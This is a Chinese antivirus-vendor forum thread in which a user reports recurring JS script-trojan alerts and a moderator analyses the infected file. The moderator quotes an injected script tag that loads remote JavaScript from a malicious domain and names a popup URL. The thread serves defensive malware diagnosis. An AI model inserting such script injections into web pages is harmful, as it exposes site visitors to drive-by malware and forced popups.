西风秋雨 - 2011-11-18 9:52:00
前几天很好,这几天每天都跳出这个Trojan.script.JS.Pop.a
瑞星提示是已经删除病毒。度娘了下,说是JS脚本木马。我很郁闷。安全模式下杀毒,显示结果是没有病毒。但是在正常模式下,是不是就会出现这个。
求助各位了。
用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 2.0.50727; Alexa Toolbar; TheWorld)
networkedition - 2011-11-18 9:54:00
将报毒文件从瑞星病毒隔离区里找到恢复后压缩跟帖上传。
西风秋雨 - 2011-11-18 10:27:00
文件类型不能上传,压缩文件就被系统杀死。。。
networkedition - 2011-11-18 10:31:00
暂时关闭文件监控上传,上传到网盘吧,
www.115.com,论坛压缩格式zip、rar都支持的。
西风秋雨 - 2011-11-18 10:51:00
谢谢斑竹的指点,已经解决了。
附件论坛就可以上传
附件:
文件.rar
networkedition - 2011-11-18 11:00:00
报毒页面底部被写入了恶意链接地址:
<script language=javascript src=http://www.haofbi.com/js/w.js></script>
这个链接地址已经失效。
networkedition - 2011-11-18 11:05:00
tui[1].js会弹出:http://www.1ye1.com/index2.html这个地址,强制弹窗。
西风秋雨 - 2011-11-18 11:07:00
嗯嗯,问下版主大大,我看着 流量精灵 和 流量宝 这两个软件。您说,是不是因为这两个软件,从后台开启了分享网页,而导致我机器感染的这些JP木马呢?我很怀疑是这个,因为在没有开启这两个软件之前,我电脑没问题。偶尔有些病毒,也是因为看电影引起的(您懂的。。。),而且流量精灵我度娘了下,也纷纷有人说感染了病毒。
networkedition - 2011-11-18 11:12:00
这两个软件没有用过,你传上来的页面是中华养 生保健网,不知道是你访问了中华养 生保健网还是你说的这两个软件强制劫持访问这个网站。如果是你访问中华养 生保健网,那么建议就暂时不要访问了,如果是那两个软件导致,建议卸载不要安装使用。
西风秋雨 - 2011-11-18 11:27:00
嗯嗯,版主大大。我没访问过这个网站。因为流量宝和流量精灵这两个软件,就是给网站刷流量的。原理和BT下载一样。就是提供平台,然后软件负责相互访问。如此来说,版主大大分析的对,可能就是因为相互访问,导致的病毒扩散。
linayi - 2011-11-18 19:14:00
解决了就好,一般不知道怎么办的可以上报瑞星
goodcool1314 - 2011-11-18 22:25:00
版主们真尽职尽责,感觉很有归属感。
毯子旋律 - 2011-11-18 23:43:00
瑞星工作人员已经帮你解决了。。:kaka12:
© 2000 - 2024 Rising Corp. Ltd.